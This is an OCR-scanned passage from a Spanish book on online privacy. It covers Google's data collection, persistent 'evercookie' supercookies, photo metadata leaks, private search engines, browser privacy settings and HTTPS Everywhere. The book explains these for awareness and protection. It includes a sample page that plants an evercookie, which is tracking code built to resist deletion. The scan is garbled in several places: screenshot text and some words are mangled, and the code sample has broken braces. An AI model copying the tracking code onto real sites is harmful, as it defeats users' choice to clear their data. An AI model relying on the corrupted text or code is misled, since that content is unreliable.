no obstante, son pocos los que saben que dicha informacion queda registrada y vinculada 
automaticamente a la cuenta del usuario que tiene iniciada su sesion. Por ejemplo, si en el navegador 
del usuario hay una pestana con una sesion abierta en el servicio de correo de Gmail y en otra pestana 
realiza cualquier busqueda en Google, los criterios ingresados por el usuario son automaticamente 
registrados y asociados a su cuenta. El sistema de registro es tan completo, que incluye los criterios 
de busqueda ingresados en los ultimos dias, las paginas visitadas de los resultados de la busqueda, 
fecha y hora, estadisticas sobre la actividad del usuario por hora y dia, entre muchos otros detalles que 
muchos la interpretan como una clara violation a la confidencialidad y privacidad de la informacion. 
Para ver el registro de busquedas y la actividad de un usuario autenticado, se puede acceder al 
siguiente servicio: https://history.google.com/history/ 

Registro de dispositivos 

Google tambien guarda un registro de los dispositivos que el usuario ha utilizado para conectarse 
a cualquiera de sus servicios. Dicha caracteristica puede ser util para identificar una intrusion en 
la cuenta y tomar las medidas oportunas, algo que desde luego es muy importante para cualquier 
usuario, sin embargo tambien almacena un registro del tipo de dispositivo utilizado, navegador y 
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cbicacion geografica. Para verificar los dispositivos que han accedido a una cuenta concreta, Google 
pone a disposicion de todos sus usuarios el siguiente servicio: https://security.google.com/settings/ 
security/activity 

Administrador general de cuenta 

Este servicio contiene un registro global de toda la actividad de una cuenta determinada en el que 
se ensena, entre otras cosas, conversaciones, dispositivos, registros de audio y video, calendarios 
creados en Google Calendar, documentos subidos al servicio de Google Drive, historial de 
ubicaciones geograficas recolectadas, etc. Si una cuenta lleva activa algunos anos y el usuario la 
usa con frecuencia, resultara sorprendente ver la cantidad de informacion que Google ha podido 
recolectar sobre el propietario de la cuenta. Si el lector tiene una cuenta y siente curiosidad por la 
informacion que ha podido recolectar Google, tiene a su disposicion el siguiente servicio: https:// 
www.google.com/settings/dashboard 

Perfiles de usuarios mediante anuncios 

Si el lector suele utilizar con frecuencia el buscador y cree que al no contar con una cuenta valida 
Google desconoce su edad, sexo y preferencias basicas, se equivoca. Aunque utilizar el buscador 
de Google no supone coste economico alguno y no es necesario tener una cuenta para utilizarlo 
plenamente, los criterios de busqueda y la informacion basica de millones de usuarios es registrada 
y almacenada diariamente, podria afirmarse que los usuarios pagan este tipo de servicios con la 
moneda de su privacidad. La informacion recolectada por Google es utilizada para ensenar anuncios 
personalizados dependiendo de las preferencias basicas y los criterios de busqueda utilizados por 
cada usuario y para ver que informacion tiene Google, basta con dirigirse a la interfaz web de 
configuration de anuncios. Dicho servicio se encuentra disponible en la siguiente direction: https:// 
www.google.com/settings/ads 

Registro de ubicaciones 

Cuando un dispositivo Android tiene los servicios de geolocalizacion activados y ademas, si alguno 
de los servicios de Google requiere utilizarlos, la informacion geografica de los sitios por los cuales 
ha estado dicho dispositivo es registrada directamente en los servidores de Google. Esta situation 
para la mayoria de los usuarios es indeseable y por este motivo es recomendable no activar los 
servicios de geolocalizacion que vienen incluidos en los dispositivos con Android. No obstante, 
algunas personas ven el sentido practico de este servicio en el hecho de que pueden ver en donde 
han estado en una fecha concreta en caso de no recordarlo y necesitarlo para cualquier proposito. 
Para poder acceder a todas las georeferencias recolectadas por Google sobre una cuenta de usuario 
concreta, se encuentra disponible el servicio Google Location History en la siguiente direction: 
https://maps.google.com/locationhistory 

Permisos sobre una cuenta de Gmail 

Del mismo modo que Google cuenta con un servicio para conocer los dispositivos que se 
han utilizado para acceder a una cuenta, tambien permite la gestion de los permisos que se han 
concedido a aplicaciones extemas y en tener la posibilidad de revocar dichos permisos. Se trata de 
una caracteristica muy interesante que permite mantener una cuenta segura y gestionar de forma 
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granular cada uno de los permisos que tiene una aplicacion. Desde el punto de vista de la privacidad, 
permite controlar que tipo de informacion personal podra ser accedida por aplicaciones extemas y 
limitar las fiigas de informacion que puedan producirse. El servicio se encuentra disponible en la 
siguiente direction: https://security.google.com/settings/security/permissions 

Finalmente, los servicios que ofrece Google son probablemente los mas completos y sofisticados 
que existen actualmente, no obstante, es importante que el usuario sea consciente de que estos 
servicios en realidad no son gratuitos, ya que empresas como Google se mantienen por la cantidad 
de informacion que poseen y porque saben explotarla adecuadamente para diversos fines, entre los 
mas conocidos, las campanas de publicidad y marketing. 

Dicho lo anterior, hay que aclarar que no se anima al lector a dejar de beneficiarse de las ventajas 
que ofrece Google, pero si tener pleno conocimiento de la politica de privacidad que manejan sus 
servicios y utilizar las herramientas adecuadas para evitar fugas de informacion personal o de 
cualquier tipo. 

Es especialmente interesante leer la section en la que se explica que informacion recolecta Google 
y como es utilizada: https://www.google.eom/intl/es-419_es/policies/privacy/#infocollect. Si bien 
es cierto que la informacion recolectada facilita las busquedas y el uso de ciertos servicios, algunos 
preferiran contar con menos comodidades con el fin de mantener su informacion personal como 
deberia de estarlo: privada y confidencial. 

1.1.1.9 Supercookies o cookies persistentes 

El termino supercookie se refiere a cualquier tipo de informacion que puede almacenarse 
en el navegador del usuario y aunque el usuario las tenga desactivadas en su navegador o sean 
eliminadas, puedan recrearse automaticamente. Las cookies son elementos que se pueden eliminar 
muy facilmente del navegador y en la mayoria de casos no representaran mayores problemas, sin 
embargo, una cookie persistente utiliza multiples espacios de almacenamiento en el cliente y de esta 
forma, resulta mucho mas dificil eliminar toda la informacion almacenada en el navegador. 

Una cookie persistente puede almacenar informacion en el espacio estandar de cookies, en el espacio 
WebSQL del navegador, en la zona almacenamiento local, global y de sesion, en cookies flash 
(objetos locales compartidos), en la cache del navegador, entre otros lugares. 

Una caracteristica comun en las cookies persistentes, es que cuando se eliminan en uno o varios 
de los espacios pero no de todos, el sitio web que ha implementado la cookie persistente es capaz 
de detectar que el usuario ha intentado hacer una limpieza y se encarga de restablecer los valores 
en cada espacio de almacenamiento, revirtiendo la action de borrado realizada por el usuario. Esto 
quiere decir que se debe eliminar la informacion de la cookie persistente de todos los sitios donde 
se ha guardado y si falta al menos un sitio por limpiar, dichos valores volveran a ser restablecidos. 

Las cookies persistentes representan una forma muy agresiva de monitorizar la navegacion y una 
de las implementaciones mas conocidas es la que ha desarrollado el investigador Sarny Kamkar 
(tambien conocido por el desarrollo del virus “ Sarny ”) la cual recibe el nombre de “evercookie”. 
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Evercookie 

Se trata de una API que cuenta con varios elementos que desde el punto de vista tecnico resultan muy 
interesantes, pero que desde una perspectiva practica, guardan una estrecha relation con campanas 
de marketing agresivas y con el perfilado de usuarios, actividades que suelen ser consideradas 
ilegales en algunos paises. 

Esta herramienta cuenta con una API en Javascript que permite crear cookies persistentes que a la 
fecha de redactar este documento, se incluyen en las siguientes zonas del navegador del cliente. 

- Cookies HTTP estandar. 

- Objetos compartidos locales (Cookies Flash). 

- Almacenamiento en Silverlight 

- Almacenamiento de cookies en formato RGB usando la etiqueta “ canvas ” de HMTL5 

- Multiples ubicaciones de almacenamiento definidas en la especificacion de HTML5 
(Almacenamiento local, global, session, WebSQL con SQLite y WebSQL con IndexedDB). 

- Almacenamiento persistente en JNLP PersistenceService. 

Para utilizar esta libreria se debe descargar desde el repositorio de GitHub ubicado en la siguiente 
ruta: https://github.com/samyk/evercookie y posteriormente, se puede comenzar a utilizar la 
API Javascript de Evercookie en cualquier pagina web. De esta forma, cuando un cliente intente 
acceder a los contenidos de un sitio web con “ evercookie ” correctamente configurado, su navegador 
almacenara los valores definidos en la cookie en diversos espacios de almacenamiento, dificultando 
enormemente su elimination. 

La siguiente pagina web ensena el uso mas basico de la API de Evercookie y demuestra lo facil que 
puede llegar a ser crear una cookie persistente en el navegador web de un usuario en Internet. 

<html> 

<head> 

<script type="text/javascript" src="js/swfobject-2.2.min.js"></script> 

<script type="text/javascript" src="js/evercookie. js"></ script> 

<script> 

var ec = new evercookie({ 
baseurl: '/test', 
asseturi: '/assets', 
phpuri: '/php' 

)); 

ec.set("user", "adastra"); 

ec.get("user", function(value) { alert("Cookie value is " + value) )); 
function getCookie(best_candidate, all_candidates) 

( 

for (var item in all_candidates) 

document.write("Storage mechanism " + item + " returned " + all_ 
candidates[item] + "votes<br>"); 

1 

ec.get("user", getCookie); 

</script> 

</head> 








26 


Deep Web: TOR, FreeNET & I2P - Privacidady Anonimato 


<body> 

<hl>Hello buddy!</hl> 

</body> 

</html> 

La pagina web anterior no tiene ningun contenido visual que pueda atraer al cliente, ya que solamente 
ensena un mensaje de texto simple, sin embargo lo que resulta realmente interesante es la seccion 
donde se define el “head" de la pagina, en donde a su vez, se cargar dos ficheros Javascript ubicados 
en el directorio “js”. Posterior a la carga de dichos ficheros, los cuales contienen toda la logica 
necesaria por “ Evercookie ” para poder funcionar, se procede a crear una cookie persistente simple 
que unicamente contiene la clave “user" con valor “ Adastra ”. 

Como se puede apreciar, tambien se define una funcion de “ callback” que sera invocada 
automaticamente cuando se consiga obtener el valor de la cookie en el navegador del visitante, lo 
que significa que se trata de un cliente que ha consultado anteriormente la pagina web y tiene en 
su navegador la cookie instalada. En este caso, aunque se intente eliminar las cookies utilizando el 
procedimiento habitual o limpiando la cache, formularios guardados, cookies, etc. Evercookie vuelve 
a recrearse automaticamente en cada una de las zonas de almacenamiento indicadas anteriormente 
cuando el usuario vuelva a visitar la pagina web que instancia la evercookie, convirtiendola en un 
elemento dificil de remover del navegador. 

1.1.1.10 Descuidos y malas practicas 

Las tecnicas descritas en parrafos anteriores detallan como el proveedor de un servicio puede atentar 
contra la privacidad de sus usuarios, sin embargo, en muchas ocasiones el problema son los malos 
habitos, descuidos o simplemente falta de interes por parte del usuario a la hora de mantener su 
informacion confidencial y privada. Son muchas las huellas que se pueden dejar navegando por 
Internet, incluyendo informacion personal que puede ser utilizada para identificar y localizar a un 
usuario. 

Un ejemplo de dichos descuidos consiste en subir documentos o imagenes a servicios publicos en 
Internet con metadatas identificativos. Los metadatas en un documento pueden contener informacion 
sobre su creador y en algunos casos, informacion geografica que puede ser utilizada para obtener la 
localization fisica del usuario. Por poner un ejemplo, actualmente hay un “boom" en redes sociales, 
blogs y diversos sitios en Internet en los que sus usuarios comparten imagenes de sus gatos, es algo 
cada vez mas comun y que desafortunadamente, no se tiene en cuenta o simplemente se desconoce 
la informacion que realmente se comparte con extranos a la hora publicar dichas fotos. 

En este sentido, el servicio “/ Know where your cat lives” (http://iknowwhereyourcatlives.com/) 
es un claro ejemplo sobre como se puede obtener informacion tan personal como la ubicacion 
geografica del sitio en el que se ha tornado una inocente foto de un pequeno felino. El servicio en 
cuestion se encarga de ejecutar procesos de scraping contra sitios de comparticion de imagenes en 
Internet como Instagram, Flickr y Twitpic con el fin extraer imagenes con tags como “cat” y sobre 
dichas imagenes se intenta extraer datos relacionados con la ubicacion geografica donde fue tomada 
la fotografia. 
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Imogen 01.01: Imagenes de gatos en Espahay Portugal recolecladaspor “Iknowwhereyourcatlives 

Como se puede apreciar en la imagen anterior, se cuentan por cientos las imagenes que se han 
capturado en Espana y Portugal, ademas en ciudades con un alto numero de habitantes como 
Madrid, se puede ver que la cantidad de imagenes recolectadas supera las dos mil, esto quiere decir 
que hay imagenes de mas de dos mil gatos que incluyen informacion geografica y las cuales, un 
porcentaje bastante alto han sido tomadas en la residencia de sus respectivos duenos. Probablemente 
el lector se puede hacer una idea de las consecuencias que esto supone para la privacidad de esas 
personas y lo peor, es que probablemente ni siquiera son conscientes de que sus habitos a la hora de 
utilizar servicios como Instagram, estan suponiendo un serio riesgo para su privacidad y seguiran 
haciendolo sin ser plenamente conscientes de ello. 

Otra practica que es bastante desaconsejable si se desea tener buenos niveles de privacidad, es el uso 
de aplicaciones en Internet que solicitan el acceso directo a dispositivos tales como la camara web 
o el microfono. A la fecha de redactar este documento, un servicio web que se esta volviendo muy 
popular entre los jovenes es “ chatrouIette.com ” una aplicacion que permite, en tiempo real, ver lo 
que esta transmitiendo la camara web y escuchar el microfono de cientos de usuarios conectados en 
Internet. 

El impacto que tiene aplicaciones como “ chatroulette ” sobre la privacidad es tremendo, ya que una 
persona extrana, ubicada en cualquier parte del mundo, puede estar viendo el entomo de otro usuario 
en un momento dado. Dicha aplicacion permite que los usuarios voluntariamente se expongan en 
Internet y entablen conversaciones con otras personas durante un periodo de tiempo determinado 
y ademas, tambien se puede acceder a datos personales como nombres, edad, ubicacion, idiomas, 
gustos y aficiones, etc. Si bien se trata de un servicio bastante novedoso para crear contactos y 
conocer gente, los descuidos y/o malas practicas en su uso pueden hacer que personas indeseables 
obtengan informacion de caracter personal. 
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1.1.2 Herramientas para impedir la vigilancia y seguimiento de 
usuarios 

Ahora que se han detallado algunas de las tecnicas mas comunes a la hora de determinar la huella 
digital de un usuario y recolectar informacion sobre el, se detallan algunas de las herramientas y 
servicios en linea mas utilizados para impedir el filtrado de informacion personal y controlar que 
informacion se debe hacer publica y que informacion se debe mantener privada. Estas herramientas 
suelen ser de uso comun y no se requieren demasiados conocimientos tecnicos para poder utilizarlas, 
dado que su objetivo principal es la usabilidad y que cualquier persona pueda configurarlas 
facilmente. En este sentido, podria decirse que se trata de herramientas para usuarios finales que 
solamente desean navegar de forma segura y confidencial por Internet. 

1.1.2.1 Buscadores 

Sin lugar a dudas Google es uno de los mejores buscadores que existen en Internet, no obstante 
como se ha podido ver anteriormente en este capitulo, tal potencia, flexibilidad y precision a la 
hora de realizar consultas puede suponer un alto precio para la privacidad de cualquier usuario. 
No obstante, es posible seguir utilizando los beneficios del buscador de Google y algunos otros de 
forma confidencial y anonima, sin relajar la privacidad y sobre todo, sin disminuir la calidad de los 
resultados. A continuation se listan algunos de los mejores buscadores que, a la fecha de redactar 
este documento, aportar una solution adecuada al problema de privacidad. 

Ixquick: https://ixquick.com/ 

Se trata del buscador web que clama ser el mas “confidencial y anonimo del mundo” ya que no 
registra la direction IP de los usuarios que lo utilizan, no realiza ningun tipo de correlation entre sus 
visitantes y los criterios de busqueda empleados y no utiliza cookies de seguimiento. Por otro lado, 
Ixquick recibio el “Sello Europeo de Privacidad” en el ano 2008, convirtiendolo en el primer motor 
de busqueda aprobado por la Union Europea y de uso recomendado por los ciudadanos europeos 
que les preocupe su privacidad. Ixquick no almacena ningun tipo de registro identificativo, no utiliza 
cookies de terceros y protege el canal de comunicacion utilizando unicamente protocolo HTTPS, sin 
embargo, es importante anotar que el listado de resultados que arrojan las busquedas pueden llevar 
al usuario a sitios que pueden utilizar mecanismos seguimiento y tracking, algo que evidentemente 
Ixquick no puede controlar dado que cuando el usuario ingresa en alguna de las paginas contenidas 
en los resultados de la busqueda, esta abandonando el motor. En este caso, es necesario que el usuario 
cuente con otros mecanismos de protection adicionales, tales como extensiones y complementos en 
el navegador web que utiliza. Algunas de estas herramientas se explicaran con mayor detalle en las 
siguientes secciones de este capitulo. 

Startpage: https://www.startpage.com 

Se trata de un buscador basado en Ixquick para garantizar que las busquedas se lleven a cabo 
de forma privada y confidencial. Probablemente una de las caracteristicas mas interesantes que 
tieneStartpage, es su capacidad de funcionar como servidor proxy entre el usuario y el motor de 
busquedas de Google. Los resultados que el usuario vera son los mismos que devuelve Google, con 
lo cual, la calidad y precision de los resultados es bastante alta, todo esto sin que Google recolecte 
informacion sobre el usuario que realiza las busquedas. 
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Por otro lado, startpage cuenta con una section de configuracion bastante elaborada, en la que 
>e pueden aplicar distintos tipos filtros, modificar el niimero de resultados por pagina, aplicar un 
filtro familiar para omitir paginas con contenidos inapropiados, interactuar con el motor utilizando 
unicamente HTTPS, etcetera. Esta interfaz de configuracion viene heredada de ixquick, el cual 
permite aplicar los mismos valores de configuracion que startpage. En el caso de que el usuario no 
qtiiera que los detalles de configuracion que ha establecido, queden almacenados directamente en 
el navegador por medio del uso de cookies, el motor tambien permite la generation de una URL 
cue al ser accedida desde cualquier ordenador, automaticamente le permite al buscador cargar la 
configuracion seleccionada por el usuario, manteniendo de esta forma las preferencias del usuario 
sin que su privacidad se vea afectada. 

Duckduckgo: https://duckduckgo.com/ 

Otro de los buscadores mas utilizados a la hora de realizar busquedas en Internet de forma privada 
v segura. Duckduckgo no registra la informacion personal del usuario ni sus criterios de busqueda, 
asi como tampoco permite el envio de informacion sobre el usuario a los sitios que el visita, como 
por ejemplo los criterios de busqueda utilizados. No registra ningun tipo de cookie o elemento de 
rastreo y ademas, no trata las cabeceras HTTP que contienen informacion que pueda ser util para el 
seguimiento del usuario, tales como el “User-Agent”, referers o la direction IP del cliente. 

1.1.2.2 Configuracion de la privacidad en navegadores web 

Existe una gran variedad de navegadores web en el mercado, con diversos tipos de licenciamiento 
y caracteristicas particulares, sin embargo en los ultimos anos las cuestiones de privacidad y 
anonimato han cobrado mayor importancia en cada nueva version de los navegadores web modemos. 
A continuation, se hace un breve repaso sobre la configuracion de la privacidad en los navegadores 
Firefox, Chromium y Opera. 

Firefox: 



Imagen 01.02: Configuracion de privacidad en Firefox. 
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Tal como se ensena en la anterior imagen, en Firefox existe una section en la zona de configuracion 
de la privacidad llamada “Rastreo” y contiene tres posibles alternativas, las cuales le indican al 
navegador la forma en la que debe comportarse ante cookies de terceros o de rastreo. El valor por 
defecto es “No indicar a los sitios nada sobre mis preferencias de rastreo” en cuyo caso los sitios web 
que utilicen cookies de terceros, deben solicitar el consentimiento explicito sobre su uso y en los 
otros dos casos, directamente se penniten o rechazan (“Indicar a los sitios que quiero ser rastreado”) 
y se rechazan (“Indicar a los sitios que no quiero ser rastreado”). 

Por otro lado, tambien es posible aplicar una configuracion personalizada con respecto al historial 
de navegacion y las cookies que se almacenan en el navegador. Es tal el nivel de personalization 
que admite Firefox sobre el uso de las cookies, que como se puede apreciar en la imagen 01.03, es 
posible crear politicas basadas en dominios para la gestion de cookies. 



Imogen 01.03: Politicos de aceptacion de cookies en Firefox. 

Evidentemente los sitios web incluidos en la politica de aceptacion del navegador deben ser de 
confianza y lo suficientemente conocidos por el cliente como para fiarse de ellos. 

Opera 

Opera es un navegador web que ha tenido una evolution bastante interesante desde su primera version 
en el ano 1996, ya que desde aquel entonces, es un proyecto que ha cambiado de licenciamiento 
en varias ocasiones y ha incluido mejoras bastante interesantes que le han permitido mantenerse y 
posicionarse en el mercado de los navegadores web como uno de los mas antiguos y a su vez, de los 
mas sofisticados. Tambien hay que comentar que tiene una ventaja que otros navegadores web no 
tienen y es que existen versiones para todo tipo de dispositivos incluyendo televisores inteligentes. 
Del mismo modo que ocurre con Chromium y Firefox, es posible aplicar opciones de configuracion 
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jae permiten la gestion cookies, certificados SSL y contrasenas almacenadas en el navegador. 
Dicbas opciones se encuentran disponibles en el menu “Editar —» Opciones” en donde se abrira el 
perjei de administration del navegador. 


Configuracion 

Privacidad 

Borrar datos de navegacidn... Mas informaaon 

Opera podrla usar servicios web para mejorar tu expenenaa de navegacidn. Tambien puedes 

Q Configuracion de busqu ^ 

desactivar esos servicios. 

Navegador 

Tj Usar un serviao de prediccion para ayudar a comptetar busquedas y URL escntas en la barra de 

K direcciones 


tf 1 Predecir acetones de red para mejorar la carga de paginas 

Privacidad y seguridad 

□ Ayudar a mejorar Opera enviando informacidn de uso 
i Envtar in formes de cuelgue a Opera automaticamente 

Ayuda de Opera 

si Envtar petiaOn No rastreaL con ei trafico de navegacion 


Contrasenas 


Preguntar si se guardan contrasenas de sitios web 


Administrar contrasenas guardadas 


Auto rellenado 


Si Activar auto rellenado de formulanos en paginas web 


Cambiar configuracion de auto rellenado 


Cookies 


Permite guardar datos en el ordenador (recomendado) 

C Mantener datos soto hasta que cierre el navegador 

C Impedir que los sitios guarden dato alguno 

E Bloquear cookies de terceros y datos del sitio 

i Administrar excepdones... Todos los cookies y datos de sitio.. Mas informacion 


HTTPS/SSL 

_ 

Administrar certificados... | Mas informacidn 


Imagen 01.04: Configuration de la privacidady seguridad en Opera. 


Como se puede apreciar, es posible aplicar ciertas opciones que permitiran que el navegador funcione 
-_cho mas rapido e impedir el rastreo por parte de sitios web con publicidad. Por otro lado. en la 
>r-cion de “ cookies ” es posible aplicar politicas de bloqueo dependiendo del sitio web visitado. de 
esra forma, es posible indicarle al navegador que borre las cookies al salir de un sitio web o que sean 
reehazadas directamente. 

E’. identemente el efecto de aplicar este tipo de reglas depende del funcionamiento sitio web visitado, 
> a <l ue es posible que para ensenar algun tipo de contenido sea necesario el almacenamiento de 
cookies en el navegador del visitante y si dicho navegador rechaza por defecto las cookies del sitio 
®*eb. es posible que los contenidos no se puedan visualizar correctamente. Lo mas recomendable 
«- estos casos es mantener las cookies unicamente hasta que se cierre el navegador, bloquear las 
cookies de terceros y aplicar politicas de aceptacion de cookies solo en aquellos sitios web que sean 
ce confianza. 
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Configuracion 

'< 3 . ^ 

Navegador 
Sitios web 

Privacidad y seguridad 
Ayuda de Opera 


Privacidad 

3onar dales de navegadda. Mas kiformarion 
Opera podrfa usar servicios web para mejorar tu experiencia de navegadbn. Tambien puedes 
desactivar esos servtaos 

Usar un servfcio de prediction para ayudar a compleiar busquedas y URL escritas en la barra de 
- dfrecdones 

v prededr acaones de red para mejorar fa carga de paginas 
Ayuda- a mejorar Opera envfando information de uso 

✓ Envlar fnfermes de cuefgue a Opera aulomaticamente 

✓ Enviar petition No rastrear' con ei traftco de navegadon 


Excepciones de cookies y datos de sitio 


Patron de nombres de host 


Comportamiento 



gnadon 


HTTPS/SSL 

Admlntstrar ceraficados. . Mas informac&n 


Imogen 01.05: Politicos de aceptacion y bloqueo de cookies en Opera. 


Chromium 

Chromium es un navegador web de codigo abierto del cual se ha basado en el navegador Google 
Chrome, uno de los mas populares y utilizados actualmente. Se trata de un navegador que se 
caracteriza por la potencia, simplicidad y rapidez que ha heredado del uso de patrones de diseno 
avanzados y varios frameworks opensource que han facilitado su desarrollo. Tiene algunas 
diferencias con respecto a Google Chrome que son muy valoradas de cara a la privacidad, entre las 
cuales se incluye un licenciamiento abierto, la eliminacion de la marca de “ Google ” y la eliminacion 
de los parametros RLZ que permiten el seguimiento del uso del navegador por parte de Google, algo 
que viene apoyado por los terminos del acuerdo cuando se instala Google Chrome. 

Los parametros RLZ contienen informacion codificada que se envia desde el navegador Google 
Chrome a los servidores de Google e incluyen informacion muy variada, desde los errores que se 
han producido en el navegador web hasta la direccion IP desde donde se ha descargado el software. 
No obstante, tambien se debe aclarar que dichos parametros solamente se adjuntan a una peticion 
HTTP cuando se realiza una busqueda contra Google y son utilizados para identificar a los usuarios 
que utilizan Chrome. Por estos motivos, se recomienda el uso de Chromium en lugar del navegador 
Google Chrome, ademas las opciones de configuracion y la experiencia de usuario en ambos 
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iaiiir»ezadores son practicamente iguales. Para ingresar en el panel de configuracion de Chromium, 
con dirigirse al menu “Edition —► Preferencias” o ingresar en la barra de navegacion: 
\e://settings!' 


Chromium 



Configuracion 

Privacidad 


Configuracion de contenido-. Borrar datos de navegacion... 

Chromium puede utilizar servicios web para mejorar la experiencia de navegacion de los usuarios. Puedes 
inhabilitar estos servicios si quieres. Mas information 

fij Utilizar un servido web para intentar resolver errores de navegadon 

. Utilizar un servido de prediction para completar las busquedas y las URL introduddas en la barra de 
■ direcriones o en el cuadro de busqueda del menu de apbcaciones 

@j Predict network actions to improve page load performance 

Li Enviar a Coogle automaticamente informaddn sobre posibles inddentes de seguridad 

ijC Habilitar protection contra phishing y software mabdoso 

G Enviar una solidtud de no seguimiento con tu trafico de navegadon 

Installed Websites 

isB Notify me when the website I am visiting can run as an application 


Exceptions.. 


Contrasenas y formularios 

✓ Habilitar la funcion Autocompletar para rellenar formularios web con un solo dk 
Administrar configuration de Autocompletar 

S3 Preguntar si quieres guardar tus contrasenas web. Administrar contrasenas 
Contenido web 


Tamafio de fuente: Mediano 


▼ Personalize fuentes.. 


Zoom de pagina: 100% 


Red 


Chromium esta utilizando la configuracion de proxy del sistema de tu ordenador para conectarse a la red. 


Cambiar la configuradon de proxy.. 


Idiomas 

Cambiar como administra y muestra Chromium los idiomas Mas informadon 
Configuracion de idiomay de introduction de texto... 

,«/i Preguntar si quieres tradudr paginas que no esten escritas en un idioma que enbendas. 
Administrar idiomas _ 


Imogen 01.06: Configuracion de la privacidad en Chromium. 


Del mismo modo que ocurre con Firefox y Opera, es posible gestionar varios detalles de privacidad 
que y administrar cookies, sin embargo la interfaz y la forma de gestionar dichos detalles cambia 
un poco con respecto a los navegadores anteriores, ya que todas estas opciones se manejan desde 
‘'configuracion del contenido” en donde se podra ver una pequena ventana emergente con varias 
configuraciones para la gestion de cookies, Javascript, complementos instalados en el navegador, 
etcetera. En dicha ventana tambien se encuentran algunas opciones que no solamente afectan al 
contenido, sino que ademas tienen una relacion directa con la privacidad del usuario, como por 
ejemplo la posibilidad de bloquearpeticiones de sitios web que requieran conocer la ubicacion fisica 
del usuario o acceder a su camara y microfono. 
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Configuracion de contenido 
Ubicacion 

Permitir que todos los sitios realicen un seguimiento de tu ubicacion fisica 

• Preguntar cuando un sitio intente realizarun seguimiento de tu ubicacion fisica (recomendado) 
No permitir que ningun sitio pueda hacer un seguimiento de tu ubicacion fisica 

| Administrar excepciones- 

Notificaciones 

Permitir que todos los sitios muestren notificariones de escritorio 

• Preguntar cuando un sitio quiera mostrar notificaciones de escritorio (recomendado) 

Q No permitir que ningun sitio muestre notificaciones de escritorio 

Administrar excepciones... 

Pantalla completa 

Administrar excepciones... 

Cursor del ratdn 

Permitir que todos los sitios inhabiliten el cursor del raton 

• Preguntar cuando un sitio intente inhabilitar el cursor del raton (recomendado) 

No permitir que ningun sitio inhabilite el cursor del raton 


Imogen 01.07: Configuracion del contenido en Chromium. 


1.1.2.3 Navegacion segura 

Como seguramente el lector ya sabra, el protocolo utilizado por todas las aplicaciones web para la 
transferencia de datos entre cliente y servidor es el protocolo HTTP (HyperText Transfer Protocol). 
Se trata de un protocolo antiguo que ha permitido la vertiginosa evolution de Internet tal y como 
se conoce hoy en dla, no obstante, la seguridad y la confidencialidad de la informacion no se 
encontraban dentro de los objetivos de su disefio inicial. En la medida que su uso se fire extendiendo, 
los problemas eran cada vez mas evidentes, ya que el canal de comunicacion entre el cliente y el 
servidor no cuenta con ninguna capa de protection adicional que impida que cualquier otro usuario 
en la red pueda intervenir de forma pasiva o activa en la comunicacion. Dadas las implicaciones 
que esto supone, especialmente en servicios en los que la confidencialidad de la informacion es 
prioritaria, se ha creado una solution que implementa una capa de cifrado adicional en el canal de 
comunicacion entre cliente y servidor conocida como HTTPS (HyperText Transfer Protocol Secure). 
HTTPS utiliza un mecanismo de cifrado con SSL/TLS para cifrar el canal de comunicacion entre 
el usuario y el servidor, garantizando de esta forma la confidencialidad de la informacion. HTTPS 
no es un sustituto de HTTP, se trata de una capa adicional sobre el protocolo HTTP que impide que 
cualquier otro usuario que intente intervenir en la comunicacion pueda ver los datos intercambiados 
entre cliente y servidor en texto piano. 

Por otro lado, aunque hoy en dia resulta bastante comun, no todas las aplicaciones y servidores web 
proveen soporte al protocolo HTTPS, en la mayoria de los casos debido a que no se ha realizado 
la configuracion necesaria en el servidor y porque la informacion intercambiada es publica y no 
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requiere un nivel adicional de cifrado sobre los datos. Evidentemente, para navegar de forma segura 
y confidencial, una buena recomendacion consiste en utilizar el protocolo HTTS siempre que sea 
posible y que el servidor soporte las conexiones con dicho protocolo. En este sentido, una extension 
muy util que fuerza al navegador web a utilizar HTTPS para todas las peticiones a sitios web es 
~HTTPS Everywhere". 


1.1.2.4 HTTPS Everywhere 

HTTPS Everywhere es una extension que ha sido desarrollada por el equipo de Tor Project y la EFF 
I Electronic Frontier Foundation ) y cuyo principal objetivo consiste en capturar las peticiones que se 
realizan con el protocolo HTTP contra un listado de sitios previamente definido y sobrescribir dichas 
peticiones para que utilicen HTTPS. Esta extension se puede descaraar desde el sitio web oficial de 
la EFF en la siguiente ruta: https://www.eff.org/es/https-everywhere y se encuentra disponible en los 
tres navegadores mas utilizados actualmente: Firefox, Chromium y Opera. Por otro lado, HTTPS 
Everywhere puede interactuar con el “Observatorio SSL” de la EFF, el cual se encarga de recolectar 
capias de los certificados SSL para analizarlos, detectar posibles ataques de MITM y notificar a los 
usuarios. Su uso es opcional, pero bastante recomendado, ya que no afecta a la privacidad de los 
csuarios y vela por la seguridad de sus conexiones utilizando SSL. Dicha caracterlstica se puede 
-abilitar despues de instalar la extension de HTTPS Everywhere en el navegador, el cual ensenara 
una ventana explicando como funciona el observatorio SSL y los beneficios que aporta su uso. 


Opclones del Observatorio SSL 



HTTPS Everywhere puede utilizar el Observatorio SSL de EFF. Esto hace dos cosas: (1) envia copias de los 
certificados HTTPS al Observatorio, para ayudarnos a detectar ataques de 'hombre en el medio’ (MitM) y mejorar la 
seguridad de la Web; y (2) nos permite advertirle de conexiones inseguras o ataques sobre su navegador. 

Por ejemplo, cuando visita https://www.algo.com, el certificado redbido por el Observatorio indicara que alguien 
visito www.algo.com, pero no quien visito el sitio, o que pagirta especifica miro. Pase el raton sobre las opciones 
para mayores detalles: 

B^Utilizar el Observatorio? 

- Veriricar certificados utilizando Tor para mantener anonimaco (requiere Tor) 

• Verificar certiFicados induso si Tor no esta disponible 
9 Cuando vea un nuevo certificado, informr al Observatorio a cual Proveedor de Internet esta conectado 
9 Mostrar una advertencia cuando el Observatorio detecte un certificado revocado no detectado por su navegador 
Ocultar opciortes avanzadas 
B Enviar y verificar certificados auto*firmados 
Activar esto es seguro, a menos que use una red corporativa muy intrusrva: 

■ Envia y verifica los certificados firmados por autondades de certification raiz (ACs /CAs) no estandares 

Seguro, a menos que use una red corporativa con nombres de servidores de intranet secretos: 

B Enviar y verificar certificados para nombres no publicados en DNS 

Usto 


Imogen 01.08: Habilitando el SSL Observatory en la extension HTTPS Everywhere. 
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Ademas de forzar que las peticiones de los clientes se realicen utilizando HTTPS, tambien incluye 
soluciones a problemas de bastante comunes cuando se navega por sitios web con HTTPS, como por 
ejemplo, enlaces a recursos con HTTP cuando se esta navegado por HTTPS. La extension se encarga 
de aplicar una serie de reglas de sobreescritura que permiten detectar problemas sobre el canal de 
comunicacion e intentar mitigarlos cambiando todas las peticiones con HTTP por HTTPS. Dichas 
